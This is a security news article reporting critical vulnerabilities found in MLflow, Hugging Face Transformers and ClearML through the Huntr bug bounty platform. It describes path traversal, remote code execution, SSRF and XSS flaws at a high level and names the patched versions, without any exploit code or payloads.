Artificial Intelligence

Critical Vulnerabilities Found in Open Source AI/ML Platforms

Security researchers flag multiple severe vulnerabilities in open source AI/ML solutions MLflow, ClearML, Hugging Face.

Security researchers flag multiple severe vulnerabilities in open source AI/ML solutions MLflow, ClearML, Hugging Face.

Over the past month, members of the Huntr bug bounty platform for artificial intelligence (AI) and machine learning (ML) have identified multiple severe vulnerabilities in popular solutions such as MLflow, ClearML, and Hugging Face.

With a CVSS score of 10, the most severe of the identified issues are four critical issues in MLflow, a platform for streamlining ML development that offers a set of APIs supporting existing ML applications and libraries.

One of the issues, CVE-2023-6831, is described as a path traversal bug rooted in the deletion of artifacts, an operation during which the path is normalized before use, allowing an attacker to bypass validation checks and delete any file on the server.

The second vulnerability, CVE-2024-0520, exists in the mlflow.data module, which can be abused with crafted datasets to generate a file path without sanitization, allowing an attacker to access information or overwrite files and potentially achieve remote code execution (RCE).

The third critical flaw, CVE-2023-6977, is described as a path validation bypass that could allow attackers to read sensitive files on the server, while the fourth, CVE-2023-6709, could lead to remote code execution when loading a malicious recipe configuration.

All four vulnerabilities were resolved in MLflow 2.9.2, which also patches a high-severity server-side request forgery (SSRF) bug that could allow an attacker to access internal HTTP(S) servers and potentially achieve RCE on the victim machine.

Another critical-severity flaw was identified in Hugging Face Transformers, which provides tools for building ML applications.

The issue, CVE-2023-7018, exists because no restrictions were implemented in a function used for the automatic loading of vocab.pkl files from a remote repository, which could allow attackers to load a malicious file and achieve RCE. Transformers version 4.36 resolves the vulnerability.

Advertisement. Scroll to continue reading.

The members of the Huntr community also identified a high-severity stored cross-site scripting (XSS) flaw in ClearML, an end-to-end platform for automating ML experiments in a unified environment.

Tracked as CVE-2023-6778, the issue was identified in the Markdown editor component of the Project Description and Reports sections, which allows for the injection of malicious XSS payloads if unfiltered data is passed to it, potentially leading to user account compromise.

Protect AI, which has not made public details on a critical-severity Paddle command injection bug (CVE-2024-0521), says that all vulnerabilities were reported to project maintainers 45 days prior to the publication of their report.

Related: NIST: No Silver Bullet Against Adversarial Machine Learning Attacks

Related: Major Organizations Using ‘Hugging Face’ AI Tools Put at Risk by Leaked API Tokens

Related: Over a Dozen Exploitable Vulnerabilities Found in AI/ML Tools

Related Content

Artificial Intelligence

When not scamming other criminals, criminals are concentrating on the use of mainstream AI products rather than developing their own AI systems.

Artificial Intelligence

Israeli AI security firm Apex has received $7 million in seed funding for its detection, investigation, and response platform.

Artificial Intelligence

Japan's Prime Minister unveiled an international framework for regulation and use of generative AI, adding to global efforts on governance for the rapidly advancing...

Artificial Intelligence

AI-Native Trust, Risk, and Security Management (TRiSM) startup DeepKeep raises $10 million in seed funding.

Artificial Intelligence

Microsoft provides an easy and logical first step into GenAI for many organizations, but beware of the pitfalls.

Artificial Intelligence

CEOs of major tech companies are joining a new artificial intelligence safety board to advise the federal government on how to protect the nation’s...

Artificial Intelligence

New CISA guidelines categorize AI risks into three significant types and pushes a four-part mitigation strategy.

Artificial Intelligence

Pope Francis has called for an international treaty to ensure AI is developed and used ethically, devoting his annual peace message this year to...

Copyright © 2024 SecurityWeek ®, a Wired Business Media Publication. All Rights Reserved.

Exit mobile version